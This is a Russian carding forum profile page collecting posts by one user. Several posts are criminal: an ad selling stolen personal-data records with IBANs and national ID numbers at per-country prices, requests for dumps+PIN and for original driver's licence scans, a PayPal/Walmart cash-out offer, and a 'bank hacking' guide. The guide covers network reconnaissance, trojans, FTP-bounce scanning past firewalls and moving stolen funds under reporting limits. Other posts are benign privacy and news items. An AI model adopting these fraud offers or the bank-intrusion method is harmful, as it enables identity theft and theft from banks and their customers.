Акция 2024: Оплачиваем написание статей на кардинг тематику. Подробности
Перейти к содержанию
Искать в
  • Ещё...
Поиск результатов, которые содержат...
Поиск результатов в...

0men0

Пользователи
  • Публикаций

    30
  • Зарегистрирован

  • Посещение

Весь контент 0men0

  1. Привет. Ищу пробивщика по этим сервисам. Предложения в ПМ пожалуйста.
  2. Привет коллега! Надоело лопатить форумы в поисках нормальных строк? Тратишь кучу денег на мат? со старых баз никуда не лезет? Тогда ты попал в нужное место! ПРЕИМУЩЕСТВА 1. Мы сами добываем и обрабатываем строки 2. Очень конкурентные цены. 3. Валид наших строк от 75% и выше 4. Если валид не соответствует заявленному делаем замену. 5. Индивидуальный подход к каждому клиенту. 6. Есть возможность заказать строки под нужную вам страну,если таковой нет в наличии. 7. Оптовым покупателям хорошие скидки Основные страны: United Kingdom 0-100 [0.6$] шт/pcs 100-1000 [0.4$] шт/pcs 1000-10000 [0.3$] шт/pcs 10000+ [0.1$] шт/pcs Netherlands [0.7$] шт/pcs Belgium [0.7$] шт/pcs Norway [0.8$] шт/pcs Sweden [1.3$] шт/pcs Danmark [0.8$] шт/pcs Spain [0.8$] шт/pcs Germany [0.8$] шт/pcs Germany+IBAN [1.5$] шт/pcs Australia [0.8$] шт/pcs Brazil [0.8$] шт/pcs Italy [0.8$] шт/pcs France [1$] шт/pcs Так же сеть возможность добыть строки нужных вам стран под заказ Валид от 75% с возможностью замены если процент ниже! (обсуждается с каждым индивидуально,зависит от места применения) [format: name:surname:dob:zip:adress] [ Italy + code fiscale] [Sweden-Danmark+personal number]
  3. Кто подскажет где найти , был вендор по продаже д+п , сейчас пропал. Спасибо
  4. 0men0

    Vcc walmart 485$

    Продам залив с пп после 180,на гарант согласен за вас счет или оплата вперед бтц. 40% в мою сторону.
  5. цветные сканы\фото водилы ТОЛЬКО ОРИГИНАЛ, отрисовка не катит. в личку
  6. Анонимный Linux дистрибутив Содержание Предисловие Защита Гибкость развертывания Простота в работе Документация и поддержка Состояние разработки Приложения для защиты Вердикт Приватность — одна из про­блем, постоянно привлекаю­щих наше внимание: на страницах нашего сайта вы уже читали о дистрибутивах, укрепляющих вашу кон­фиденциальность . И мы возвра­щаемся к ним снова. Наша одержимость этой темой сравнима с той ситуацией, ко­гда Боб Марли явился на концерт через два дня после стрельбы в него и произнес зна­менитую фразу: «У тех, кто старается сде­лать этот мир хуже, нет выходных. Так поче­му они должны быть у меня?». Точно так же, нет недостатка в любителях отследить все наши действия онлайн, и нам приходится предпринимать профилактические меры и задействовать все ресурсы, чтобы пресечь их попытки нарушить на­шу конфиденциальность. Все дистрибу­тивы в этом Сравнении были созданы спе­циально, чтобы снабдить вас средствами защиты вашей приватности и предотвра­щения случайных утечек. Подходы у них могут быть разные, и у каждого — свои достоинства и недостатки. Одни использу­ют направление вашего WEB-­трафика через хорошо известные сети анонимности типа Tor; другие применяют новаторские мето­ды, такие, как безопасность посредством разбиения на части. Кроме того, посколь­ку безопасность и анонимность идут рука об руку, использование этих дистрибутивов поможет защитить ваш компьютер от хакеров и других заинтересованных деанонимизировать вас или взломать ваш компьютер. Защита Какие механизмы они используют? У Trusted End Node Security, как и у его коллег, модифицированное ядро вместе с другими инструментами, например, DNSCrypt, для предотвращения имитации имени домена через аутентифи­кацию коммуникаций между компьютером и DNS-­преобразователем. TENS еще вклю­чает приложение для шифрования и де­шифрации отдельных файлов и целых ди­ректорий, и работает со смарт-­картами Common Access Card (CAC) [Карта Обще­го Доступа] и Personal Identity Verification (PIV) [Удостоверения Личности] от Мини­стерства обороны США для доступа к от­крытым не для всех сайтам правительства. Tails построен вокруг Tor, открытой сети анонимных серверов для прикрытия вашей личности. Tails также содержит инструменты, помогающие настроить сеть, и браузер с расширениями защиты конфиденциальности с солидной репутацией, плюс ряд ценных криптографических инструментов для шифрования дисков и онлайн-коммуникаций. Whonix эксплуатирует концепцию безопасности через изоляцию и поставляется в виде двух виртуальных машин. Смысл подобной формы в том, чтобы изолировать среду, в которой вы работаете, от точки доступа к Интернету. Вдобавок Whonix направляет весь интернет-­трафик через Tor. Благодаря подобной структуре, даже если один из компьютеров окажется скомпрометирован, выяснить ваш реальный IP­-адрес будет невозможно. Subgraph OS позиционируется как «компьютерная платформа для защиты от злоумышленника» и анонимизирует весь ваш интернет­ трафик, направляя его через сеть Tor. Ядро дистрибутива усиленно заплатками от проекта Grsecurity, что делает Subgraph OS более устойчивой к уязвимостям системы безопасности. Помимо всего этого, дистрибутив запускает многие настольные приложения внутри песочницы, чтобы сократить риск в случае наличия бреши. Аналогичный уровень всесторонней защиты вы найдете и в Linux Kodachi: он тоже сначала направляет все соединения с Ин­тернетом через VPN, а затем передает их в сеть Tor. Kodachi также снабжен ря­дом инструментов для легкой замены иден­тификационной информации, например, страны выхода из Tor и перенастройки ва­ших DNS­-серверов и прочего одним щелч­ком. Дистрибутив шифрует соединение с DNS­-преобразователем и включает хо­рошо известные инструменты шифрова­ния и конфиденциальности для шифрова­ния всех ваших локальных файлов, писем электронной почты и мгновенных сообще­ний. По окончании использования Kodachi удаляет следы этого использования с ком­пьютера при выключении. Гибкость развертывания Как взаимодействуют с физическими дисками? Персистентное хранение и конфи­денциальность не слишком хоро­шо сочетаются друг с другом. Хо­тя все дистрибутивы в нашем Сравнении тщательно избегают взаимодействия с жесткими дисками на компьютере, некоторые дают вам возможность закрепить их, если, по ­вашему, преимущества постоянной ус­тановки перевешивают ее недостатки. Единственным исключением является TENS, который вообще нельзя установить. Отсутствует механизм установки также и для Whonix. Проект предлагает несколько механизмов развертывания, самый удоб­ный из которых — скачать виртуальные машины, которые функционируют как лю­бой другой установленный дистрибутив. Linux Kodachi включает скрипт установки, который помогает поставить дистрибутив на жесткий диск, как любой обычный ди­стрибутив Linux. Однако этот установщик весьма рудиментарен и использует GParted для нарезки диска. Вы также не можете из­менить имя пользователя по умолчанию, иначе многие индивидуальные скрипты по­сле установки работать не будут. Tails особо заботится о том, чтобы не ис­пользовать жесткие диски компьютера, даже если на них есть место для свопинга, но включает программу установки, чтобы создать постоянный раздел на том же уст­ройстве USB, с которого вы загружаетесь, или на другом USB­-хранилище. Программа установки позволяет выбрать тип данных, которые вы хотите сохранить с помощью таких опций, как ключи SSH, настройки Pidgin, конфигурация Icedove и электрон­ной почты, пакеты APT и т. д. У вас также есть опция создать папку для хранения лю­бых персональных документов. Даже если вы создали постоянный том, Tails дает воз­можность загрузиться в первоначальную среду, если вам в данный момент не нужен доступ к вашим личным данным. Простота в работе Нужны ли специальные навыки для работы с ними? Приватность и анонимность — две разных концепции, которые часто путают. При­ватность — это возможность придержать некоторые вещи исключительно за собой; и наобо­рот, анонимность — это когда вы не возражаете против того, чтобы другие видели ваши действия, но пусть никто не знает, что это именно вы. Сохранение анонимности без нарушения кон­фиденциальности в Интернете требует опреде­ленного компромисса. Во ­первых, стоит ожидать меньшей скорости работы, поскольку пакеты дан­ных кружат по всему миру, прежде чем прибыть на ваш компьютер. Во вторых, некоторые дистри­бутивы придерживаются более строгой политики паролей, например, для сокрытия вашей инфор­мации для входа в систему или шифрования ва­ших файлов. Всё это не должно порочить удобство работы в Сети или на компьютере. Мы будем искать те дистрибутивы, которые обеспечивают максимальную безопасность при минимальных неудобствах. Linux Kodachi Дистрибутив загружает сильно измененный рабочий стол Xfce, который ото­бражает полезную информацию о системе прямо на рабочем столе, в том чис­ле состояние и IP­адрес VPN, MAC­адрес, IP­адрес Tor, потребление CPU, дан­ные памяти и трафика. Как только Kodachi установит соединение с Интернетом, вы сможете запустить Kodachi VPN, который также установит автоматическое соединение с Tor. Анонимный Linux дистрибутив Linux Kodachi Опытные пользователи могут подключиться через собствен­ный VPN. Дистрибутив также позволяет выбрать узлы выхода по странам с по­мощью опции инструментов Tor в доке. В доке имеются все приложения и ин­струменты частого пользования, например, Tor browser, инструменты VPN, инструменты DNS и приложения безопасности. Пункт дока, отмеченный, как Pain Room, обеспечивает доступ к некоторым полезным инструментам конфи­денциальности, таким, как возможность создавать новый MAC­адрес, очищать ОЗУ и освобождать место. Subgraph OS Простота в использовании — одна из целей дистрибутива, в частности, для его инструментов конфиденциальности, но без ущерба их эффективности. С этой целью он использует рабочий стол Gnome 3. Подключившись к Интернету, ди­стрибутив устанавливает соединение с сетью Tor. После подключения можно запускать Tor browser из Activities Overview. Subgraph не включает Tor browser по умолчанию, но скачает его, как только вы его запустите в первый раз. Анонимный Linux дистрибутив Subgraph OS На пер­вый взгляд дистрибутив выглядит, как любой другой рабочий стол Gnome. Од­нако набор приложений по умолчанию раскрывает его истинные намерения. Вместо обычных приложений для общения Subgraph предлагает их альтерна­тивы, способствующие защите конфиденциальности, которые направляют всё общение через сеть Tor. Другое важное отличие в том, что разные приложения работают внутри изолированных песочниц, и вы можете отслеживать их с по­мощью значка с песочницей в меню состояния на верхней панели. Tails При запуске дистрибутива Tails показывает приветствие. Вы может выбрать использование Tails без каких­-либо изменений. Но в таком случае програм­ма приветствия позволит вам указать пароль для пользователя root и отклю­чить спуфинг MAC­-адреса, что на некоторых компьютерах вызовет проблемы при подключении к Интернету. Анонимный Linux дистрибутив Tails Когда вы выйдете онлайн, Tails автоматически подключится к сети Tor. Можно щелкнуть по значку Tor в строке состояния, чтобы просмотреть каналы и потоки. После подключения можете использо­вать Tor browser. Еще одна сеть анонимности, которая периодически проти­вопоставляется Tor — I2P (Invisible Internet Project). Вы можете подключить­ся к I2P из Tails, передав загрузочный параметр i2p при загрузке. Дистрибутив подключится к сети I2P в фоне. Когда это будет сделано, запустите прилагаю­щийся I2P Browser, который переместит вас в панель управления I2P на осно­ве браузера. Whonix Как мы уже упоминали ранее, Whonix является парой виртуальных устройств на основе Debian, и их нужно запускать одновременно на двух отдельных вирту­альных машинах. Правила iptables на Whonix-Workstation вынуждают его под­ключаться только к виртуальной интернет­ LAN и перенаправлять весь трафик на шлюз Whonix­-Gateway. Эта схема вообще не позволяет приложениям узнать реальный IP-­адрес пользователя или получить доступ к любой информации на физическом оборудовании. Анонимный Linux дистрибутив: Whonix При первом запуске оба устройства проведут вас через краткий мастер настройки, чтобы вы познакомились с проектом и на­строили некоторые компоненты, например, репозитории. В дистрибутиве име­ется значок для Tor browser, но он не предлагается по умолчанию; вместо этого значок выводит скрипт для его скачивания из списка стабильных, новых и укрепленных релизов. И, наконец, WhonixCheck сканирует текущую установку и проверяет подключение Tor. Trusted End Node Security После загрузки TENS первым делом, еще до входа в рабочий стол, попросит вас принять лицензионное соглашение. Хотя дистрибутив использует рабо­чий стол Xfce 4, он напоминает Windows XP. Всё — от структуры рабочего сто­ла, дополненной кнопкой Windows Start, и до украшений окон — разработано так, чтобы копировать проприетарную ОС. Анонимный Linux дистрибутив Trusted End Node Security Использование TENS довольно ин­туитивное. Одной из отличительных особенностей дистрибутива является приложение Encryption Wizard. После запуска вы можете перетаскивать фай­лы и создавать пароли для их защиты. Все файлы впоследствии шифруются, и их можно пересылать по электронной почте с помощью Thunderbird и Davmail, которые доступны через опцию Secure Email в меню приложений. Меню также подверглось изменениям, оно группирует приложения по их функции, напри­мер, Security and Configuration [Безопасность и Настройка], что удобно для на­чинающих пользователей. Документация и поддержка Что делать когда случается неизбежное? Полезная документация и активные каналы поддержки играют важ­ную роль в освоении любой про­граммы. Особенно это верно для дистри­бутивов для защиты приватности, которые частенько нас огорчают, предполагая необ­ходимость обучения даже для тех, кто уже знаком с Linux. Tails предлагает конечному пользова­телю углубленную документацию на раз­ных языках с общей информацией, первы­ми шагами, часто задаваемыми вопросами и подробными объяснениями, чтобы выбыли в курсе всех общих вопросов, отно­сящихся к конфиденциальности и важ­ности шифрования. Здесь даже есть чат-­рум XMPP, список рассылки по поддержке и форма для запроса функций. Whonix тоже не бросит вас на произвол судьбы: его Wiki содержит подробную доку­ментацию. Дистрибутив также предлагает не сколько опций поддержки и имеет очень активный форум. Для помощи новым поль­зователям сайт TENSсодержит несколько очень подробных FAQ, краткое руководство пользователя и справочник пользователя. Linux Kodachi тоже имеет всю необходимую информацию для знакомства с дистрибу­тивом, включая руководство по установ­ке и полезные советы по использованию. Сайт Subgraph OS подробно объясняет разные функции, ориентированные на кон­фиденциальность, и имеется также иллю­стрированный справочник в форматах ODF и HTML. Однако среди недостатков то, что TENS, Kodachi и Subgraph не имеют офици­альных средств поддержки — ни форумов, ни IRC. Иными словами, Subgraph пока что находится на самом начальном этапе. Состояние разработки Активно ли они поддерживаются? Горькая правда о модели разработ­ки открытого кода в том, что про­екты выдыхаются и умирают. Это относится и к дистрибутивам безопасности и приватности, и уже было несколько весь­ма серьезных претендентов, которые либо погибли, либо впали в анабиоз. Хотя обычно мы не оцениваем спец-ди­стрибутивы по состоянию их разработки, оно сыграет важную роль при оценке ди­стрибутивов в данном Сравнении. В конце концов, край не важно, чтобы выбранный вами дистрибутив не отставал от постоянно возникающих и развивающихся угроз ва­шей конфиденциальности — как онлайн, так и оффлайн. Если вы с подозрением относитесь к но­вым проектам, вы, возможно, решите дер­жаться подальше от Subgraph, несмотря на его прекрасную функциональность, по­скольку проект находится на очень ранней стадии развития. TENS, ранее известный как Lightweight Portable Security, обновля­ется регулярно, обычно посредством квар­тальных корректировочных версий. Ана­логично, Linux Kodachi, разрабатываемый провайдером профессиональных ИТ-­услуг в области безопасности, впервые вышел в 2013 г., но пребывал в состоянии спячки до 2016 г., и сейчас мы видим его релизы и обновления, выходящие регулярно. Who­nix выпускает свои релизы весьма активно с самого своего появления в 2012 г. и полу­чает обновления каждые несколько меся­цев. Далее идет Tails, являющийся одним из дистрибутивов безопасности с луч­шей поддержкой, с быстрым темпом раз­работки и появлением новых релизов раз в несколько месяцев. Приложения для защиты Как они прикрывают пользователя? В TENS есть инструменты, позволяю­щие проводить аутентификацию со смарт­-картами, выпущенными Министерством обороны США, и он вклю­чает публичную редакцию Encryption Wizard, созданного Исследовательской лаборато­рией ВВС США для шифрования докумен­тов и директорий. Tails, помимо Tor, имеет AppArmor для изоляции приложений; PWGen для созда­ния сильных паролей; KeePassX для управ­ления ими и AirCrackNG для аудита беспро­водных сетей. Кроме того, в Tails имеются кошелек Electrum Bitcoin, Nautilus Wipe для безопасного удаления файлов и MAT для затирания метаданных в файлах. Менед­жер обмена мгновенными сообщениями Pidgin снабжен плагином Off­The­Record (OTR), и для защиты от технологий восста­новления информации дистрибутив ис­пользует скрипты для очистки ОЗУ при пе­резагрузке или выключении. Whonix тоже использует Tor для сокры­тия вашего IP­адреса и обхода цензуры и включает MAT. Он использует аноним­ный одноранговый IM, Ricochet и удоб­ное с точки зрения конфиденциальности сочетание клиентов электронной почты Thunderbird с TorBirdy. Однако Whonix куда менее забывчив, чем Tails, и дист­рибутив не предпринимает никаких спе­циальных мер для ограничения записи на диск и по умолчанию не шифрует со­храненные документы. Linux Kodachi предусматривает па­кет инструментов защиты конфиденци­альности, и помимо Tor и VPN, там есть DNSCrypt, VeraCrypt, Peer Guardian, инст­рументы для очистки ОЗУ, Enigmail, Pidgin OTR и много чего еще. Subgraph OS запускает множество настольных приложений в песочнице безопасности Oz. Дистрибутив включа­ет CoyIM для сквозного шифрования чатов Jabber с помощью OTR. Subgraph использу­ет Ricochet и OnionShare, приложение ано­нимной одноранговой выдачи общего до­ступа к файлам. Далее имеется SubgraphFirewall, который применяет для каждого приложения политику фильтрования ис­ходящих соединений и удобен для мо­ниторинга непредвиденных соединений от приложений. Вердикт Пока Эдвард Сноуден не выступил со своими разоблачениями, по­давляющее большинство счита­ло тех, кто атаковал конфиденциальность, кем-­то вроде цифровых преступников, на­ходящихся как бы вне закона. Однако сей­час стало понятно, что мы находимся в са­мом разгаре информационной эры, когда нарушение нашей конфиденциальности яв­ляется не только популярной бизнес­-моде­лью, но и государственной практикой. С учетом практики правительства США, касающейся конфиденциальности, трудно рекомендовать дистрибутив TENS, тем бо­лее при наличии куда лучших альтернатив. Одной из них является Whonix, который использует уникальный подход к обеспе­чению конфиденциальности, заключаю­щийся в разбиении на категории. И хотя мы вполне можем себе представить опыт­ных пользователей, осиливающих его на­стройку, нельзя ожидать того же от начи­нающих, которые, вероятно, даже не вполне осознают все связанные с этим проблемы. Именно техническое превосходство дист­рибутива идет вразрез с удобством в ра­боте, предлагаемым такими его сотовари­щами, как Tails, одним из самых известных в плане обеспечения конфиденциальности и безопасности дистрибутивов. Он основан на сети Tor, регулярно обновляется и пре­доставляет вам все необходимые инстру­менты для того, чтобы замести свои сле­ды онлайн. Однако и Linux Kodachi, и Subgraph OS затмевают остальных предлагаемой обо­ими защитой конфиденциальности. Оба используют среду песочницы для изоля­ции приложений друг от друга и ограни­чения отпечатка в системе, что размещает их среди лучших средств защиты вас и ва­ших данных. Оба дистрибутива также ис­пользуют сеть Tor, но Subgraph превосходит Kodachi по предлагаемым программам. Над Subgraph OS трудится команда разработчиков, имеющих опыт разработ­ки приложений безопасности, и его одоб­рил даже Сноуден. Более того, не так давно Subgraph получил годичную поддержку разработки от Фонда открытых технологий [Open Technology Fund]. Не смотря на ран­нюю стадию разработки, Subgraph хорошо работает, но всё же победителем становит­ся не он, поскольку даже его разработчики пока не рекомендуют его для промышлен­ного применения. И у нас остается Linux Kodachi, который мы и рекомендуем. Дистрибутив не отли­чается простотой установки, но предла­гаемые им приложения и использование маршрутизации трафика через VPN перед направлением его в сеть Tor добавляет еще один уровень защиты и позволяет склонить чашу весов в его пользу.
  7. Специалисты LGTM обнаружили опасную RCE-уязвимость во фреймворке Apache Struts, который используется для создания Java EE веб-приложений и применяется во многих энтерпрайз-приложениях компаний из топа Fortune. Так, Apache Struts пользуются такие гиганты, как Lockheed Martin, Citigroup, Vodafone, Virgin Atlantic, Reader’s Digest, и так далее. Обнаруженный баг позволяет атакующему выполнить произвольный код на уязвимом сервере. Проблема получила идентификатор CVE-2017-9805 и связана с работой плагина REST, который присутствует в большинстве установок Apache Struts. По информации исследователей, уязвимость вызвана тем, как фреймворк реализует десериализацию данных поступивших из недоверенных источников. В частности плагин REST не может корректно обработать XML-пейлоад. Эксперты пишут, что баг очень похож на проблему десериализации, обнаруженную в 2015 году в Apache Commons Collection. Уязвимость представляет опасность для всех версий Apache Struts, выпущенных после 2008 года (начиная от Struts 2.5 и заканчивая Struts 2.5.12). Из-за этого все приложения, использующие фреймворк и плагин REST, уязвимы для удаленных атак, причем исследователи подчеркивают, что эксплуатировать проблему очень легко. В минувший понедельник, 4 сентября 2017 года, разработчики Apache Struts уже представили обновление, устраняющее уязвимость, Apache Struts v2.5.13. После этого аналитики LGTM сочли возможным обнародовать на GitHub proof-of-concept эксплоит.
  8. Для приема смс онлайн существуют специальные сайты, которые предоставляют специальный виртуальный номер, на который вы можете получить смс сообщение. Все представленные в этом обзоре сайты бесплатные и не требуют регистрации. Я расскажу о лучших на мой взгляд сервисах для получение смс онлайн и о том, как ими правильно пользоваться Данная статья будет постоянно обновляться, чтобы не терять свою актуальность. Поэтому если вы знаете другие сервисы предоставляющие виртуальный номер для приема смс, скиньте ссылку в коменты. Я имею ввиду что-то дельное и полезное для пользователей, а не реклама какого-то го###о-сайта! Кстати, существуют аналогичные сервисы для получения электронной почты. Такие сайты предоставляет временный почтовый ящик, которые в связке с хорошим анонимным прокси или vpn могут надежно скрыть информацию об отправителе, т.е. о вас. О таких сервисах мы писали в статье «Одноразовая почта«. Не забывайте, что отправка электронной почты дает возможность получателю узнать о вас много важной информации, такой как: определение IP-адреса, местоположения и т.д., подробно об этом мы писали в статье «IP адрес по электронной почте« Виртуальный номер для приема СМС В каких случаях может понадобится виртуальный номер для приема смс? Есть много разных ситуаций. Получение смс онлайн может использоваться в первую очередь для улучшения анонимности. Используя виртуальные номера пользователь может избежать слежки в сети интернет. Вот примеры использования сервисов приема смс сообщений.Для получения смс подтверждение онлайн. Смс онлайн через интернет можно использовать при регистрации в социальных сетях, одноклассники, вконатке и т.д. Также прием смс онлайн может понадобится при регистрация почтовых ящиков. Виртуальный номер без регистрации В данной главе я расскажу об онлайн-сервисах, которые не требуют регистрации. Этими сайтами можно пользоваться, когда необходимо быстро и бесплатно получить смс онлайн. Посылать смс на такие виртуальные номера можно только в том случае, когда в нем не содержатся никакие чувствительные данные. Чувствительными данными для меня не является код активации или пароль с логином до тех пор, пока не указанна ссылка или название сайта с которого было отправлено смс. Эта информация может быть не только в видимой части письма, но и в технических заголовках (RFC заголовки) письма. Мы рассказывали об этом в статье «Как по почте узнать IP». Ссылка была выше. Вот пример того, как нельзя использовать виртуальный номер без регистрации. Пароль и логин какого-то бедолаги я замылил, как-то не хочется участвовать в вашем взломе. Многие не очень продвинутые пользователи не учитывают, то о чем я говорил выше и такими не обдуманными действиями теряют доступ к своими и чужим аккаунтам. Поэтому если покопаться на подобных сайтах можно найти много чего съедобного. Но не забывайте, что использование чужих данных для авторизации тоже в каком-то смысле взлом. А как вы знаете, за взлом в любой стране законом предусмотрен срок. Sellaite Начнем с сайта Sellaite. Данный сайт позволяет бесплатно получить смс онлайн, используя один из свободных на тот момент номеров. Сервис не требует регистрации. Для получения смс онлайн перейдите на страницу сайта и нажмите на доступный номер. Имейте ввиду предоставляемый номер для смс может в любой момент сменится. Поэтому регистрируйте на него только то, что не потребует будущего подтверждения и привязки к номеру. Receive-SMS-Online Следующий сайт называется Receive-SMS-Online. Среди возможных виртуальных номеров часто попадаются Русские и Украинские. Что может очень полезно для нашей аудитории. Для получения смс не требуется регистрация. Заходим выбираем номер и посылаем смс. Это еще один общий публичный виртуальный номер для приема sms, так что с ним те же правила что и с первым сервисом. FreeOnlinePhone FreeOnlinePhone — сайт предоставляет онлайн номера для получения смс. Русских номеров не замечено, но не смотря на это сайт работает стабильно. ReceiveSMSOnline ReceiveSMSOnline — еще один сервис который предлагает виртуальный номер бесплатно. На момент написания статьи сервис предоставлял только Британские и Американские виртуальные номера, хотя в описании говорится еще как минимум о двух странах: Канада и Швеция. Виртуальный номер бесплатно Во время тестирования данного сервиса были задержки. С одного источника смс шла примерно 20 минут, с другого около 30. Receive-SMS Receive-SMS еще один сайт предоставляющий виртуальный номер для приема СМС бесплатно и без регистрации. Кроме бесплатного виртуального номера, предлагает продажу номеров. Цена за один номер на один месяц 9$. ReceiveFreeSMS Следующий сервис — ReceiveFreeSMS. Предлагает виртуальный номер бесплатно. И не номер, а целую кучу виртуальных номеров разных стран. Бесплатный прием смс Это лучший сервис на мой взгляд. Буду молится за его здравие, надеюсь он еще долго проживет и порадует анонимов. Имейте ввиду. Некоторые крупные сайты определяют виртуальный номер и отказываются посылать на него смс. Это происходит крайне редко, но бывает. Так что если не получается получить смс на определенный номер или вообще на какой-то сервис, то не стоит расстраиваться, пробуйте другой. Также стоит учитывать тот факт, что виртуальные номера не долговечны и имеют тенденцию часто меняться.
  9. Пользователи которые обновили Telegram могли обратить внимание на то, что в настройках популярного мессенджера появилась интересная функция. Разработчики наконец-то добавили поддержку протокола Socks5. И что это значит? А то, что теперь весь трафик Telegram можно пропустить через Tor. О том как это правильно сделать я расскажу в сегодняшней статье. Telegram через Tor Итак, для того чтобы пустить трафик Telegram через Tor, нам потребуется установить приложение Orbot и соответственно после его установки на мобильное устройство запустить. После чего запустить Телеграм и нажать иконку «Три полоски»: В настройках «Settings»: Нажать на пункте «Data and Storage»: В самом низу зайти в настройки Proxy Settings и ввести следующие значения: Если вы все правильно сделали, трафик Telegram будет идти через Tor. Кому-то это может пригодиться. А, да, я не забыл, что в статье «Запуск Tor автоматический» обещал написать про то, как пустить весь трафик Windows через Tor. Скоро будет и об этом!
  10. 0men0

    Взлом банка

    Что, устали детишки, считать себя use'верями? И правильно — это в нашем «ключе». Свою qualify надо поднимать… Как? Вершина — взлом пентагона. Но его столько раз ломали — что уже не интересно. Да и кому он нужен? Когда Аль Капоне спросили, почему он грабит банки, он сказал:«Потому что там лежат деньги!». Умный был мужик, только пил много)) Ну так вот — если если есть желание следовать заветам Великого Вождя (не пить, а деньги переводить, то могу помочь.... Попутно придется и книжек почитать, и по сетке полазить, и проклинать дебилов, которые не хотят ставить на банковские серваки MustDie! Приступим. Ставить будем W2K (для предварительной разведки) и Red Hat Linux (или FreeBSD- система заточена под сетку) — для всей остальной деятельности. Перво-наперво надо юзануть по полной ПМ (Partition Magic, а не Пистолет Макарова и создать основной раздельчик под Linux (до 2Gb) и в расширенном — раздел подкачки (swap= RAMх2). А как же любимый MustDie'98se? А никак — поверх ставим W2k Pro — и на вопрос: «Преобразовать в NTFS?», ответим :«Yes, of course». Кто работал с W2k, знает, что система устойчивая и дядька Билли постарался на славу . Кстати, а ты знал, что W2k могет без проблем выполнять некоторые проги под OS/2 и POSIX? То-то… Когда с Win'oм будет покончено, будем ставить Красную Шапку — Red Hat Linux (по-ихнему), или FreeBSD (несколько лежат на Ftp-серваке Cityline). Ну а если Шапка — то главное чтоб версия была 6-7. Если регулярно читаешь " Домашнюю энциклопедию будущих хакеров", то значит, соединение с inet'ом настроить сможешь. Правда, в Шапке есть прога Kppp — она сможет сделать все тоже самое только быстрей. Ну как? Уже сбегал за макулатурой к метро? Зачем она тебe? У тя есть Inet!!! Запускаешь до боли знакомый, но приятный, Netscape — и на русский сайт по своему *Nix'у! Да, и чуть не забыл! Смени все Nick'и и открой еще один ящик (e-mail) и подпишись на рассылки, посвященные безопасности, «дыркам» в системах, хакерах и всему подобному в этом ключе. И нечего всем вокруг рассказывать, что собираешься банк ломануть — а то далекая перспектива попасть в места «не столь отдаленные» может стать не такой уж «далекой»!!! Прошли годы… (у кул хацкеров это неделя!) Пора подумать и о безопасности!.. А то ребята на «козлике» тебя навестят Так вот, разведку будем делать сначала из-под W2k. Ставим AtGuard, заблокировав все, что только возможно , шизофренически- маниакальный NetArmor (если вытерпишь и A4Proxy (каскадинг прокси). В A4Proxy есть раздельчик «Anonimity Rank» — сделай его 15 из 15, пощелкав по check box'ам. Для пущей секьюрити PGP 6.0.2 (эта версия еще поддерживает кодирование дисков), качаем свежих троянов (потрясная штука: SpyTech Shadow Net, ни 1 антивирус ничего не нашел — не троянвсе-таки, а прога удаленного администрирования, после того как я на себя поставил и клиента и сервера — www.spytech-web.com и заводим сетевой диск на www.xdrive.com, куда будем скидывать закодированные результаты «разведки». Может потом и приедут ребята на «козле», а ты косишь под «тупого ламера» — ничего и не знаешь: «Квейк по сетке — это круто!». Настала пора выбрать цель, что проще пареной репы — куда Бог(АltaVista) пошлет. Желательно англоязычная страна и банк-эмитент карточек. «Vassisualyi Pupakov Bankos», например. Пол-дела сделано! Осталась самая малость… Открыть пластиковую карточку на личный долларовый счет, открыть пяток анонимных счетов в web-банках (через Aport посмотри) и взломать банк. Не наглей только — если сумма перевода за раз больше 10 косых и зеленых — банк расскажет о тебе налоговой! . Правда, если карточка VISA GOLD — то до 25 косых за раз, ну а если счет расчетный — то все вопросы о наглости отпадают . Про взлом *NIX — system «XAKEP» уже писал, а про разведку — самую малость… Ставим какойнить IPTools, CyberKit, NetScanTools — кому что нравится. Можно качнуть в довесок и ISS — всего-то чуть больше 30 метров — но прога приятная. Чуть позже может понадобится SubNet Calculator — если органически не приемлешь *Nix'ы (зря, кстати! . WhoIs — сервайсом выясняем какие адреса принадлежат банку владеющему страницей. А дальше — больше. Ребутнувшись для очистки совести, покурив (соображается лучше — но не злоупотреблять!!!) и «дернув» кофейку для бодрости — продолжим. С некоторых пор мне встречаются «голубые гиганты» IBM. Чтобы увидеть как идет сигнал до банка и посмотри потери через VisualRoute и сразу все поймешь — кто дает им роутинг и есть ли там FireWall. Просканим диапазон адресов и посмотрим что — где стоит. Вот тебе и адреса ихние и защита и роутинг! При наличии FW и роутинга через какойнить IBM — забываешь про Windows, теперь тебе больше не нужен. Если ничего ентого нет — все равно забудь и садись за Шапку (или FreeBSD)… Тут начинается самое интересное. «Грамотные люди» в это время уже съезжают на другую квартиру, покупают круглосуточную неогранку и переходят на макаронно- пельменную диету, щедро сдобренную кофием )) (хотя потом все так делают). Мы сделаем проще… Мой дом- моя крепость! Но ближе к делу ( в смысле к *NIX'ам). Спешка почти всегда неоправданна. Нам нужно MAXIMUM информации. На подготовку рекомендую не меньше месяца и все это время надо следить за их сеткой. Будем считать, что IBM используется у них везде или почти везде и на защиту они не поскупились (см. народ. сетевая мудрость . Пинговать внутреннюю сеть не имеет смысла (мы уже вспоминали о маршрутизации). Внутрях у них есть свой локалдиапазон адресов и поддиапазоны в нем (еще не определил границы и поддиапазоны в нем? (опять же какой к какому отделу относится?)… так вот — рассказываю как. А сканировать надо обязательно. Желательно вычислить все подключенные к их сетке машины (интересно стоит ли у них DHCP?), далее сканируй порты на каждой из них на наличие сервисов и вычисляй тип OS (это будет уже большим куском работы). Аккуратно веди журнал логов, потом с ним надо будет долго работать. Теперь немного теории. FTP протокол (RFC 959 — реализация для IP — сетей) имеет интересную функцию — возможность создания «proxy»- соединений с ftp — сервака. Если программная реализация с ftp — сервера поддерживает ftp — прокси, то это позволяет тебе, anonimous'у, подключенному к серверу создать DTP-сервер (Data Transfer Process). Hаша задача сканирования: после подключения к ftp- серверу выдаем команду PORT с параметрами IP- адрес и tcp — порт объекта сканирования. Затем выполняем LIST — и ftp — server пытается прочитать текущую директорию на объекте сканирования. Если порт на объекте скaнирования открыт получаем ответ: «150» и «226»)). Если закрыт: «425 Can't build data connection: connection refused» Естесссно, это все делается не вручную, а пишется скрипт и в цикле выдаются команды PORT и LIST и меняются номера портов. Попробуй. Это безопасный метод сканирования портов + приятная мелочь: позволяет преодолеть FireWall:))), с чем и имеем дело. Во-первых: скрываешь свой address, во-вторых используя внутренний (за FW ftp — сервер) можешь сканировать контролируемую FW сеть. И еще — есть одна потрясающая прога, которая реализует описаное выше + адм удаленных машин — «Nessus » и лежит она на www.nessus.org. Part 2: Devil Inside Чуть не забыл — когда WhoIs'ом увидишь диапазон адресов данной организации, например 195.xxx.xxx.0 — 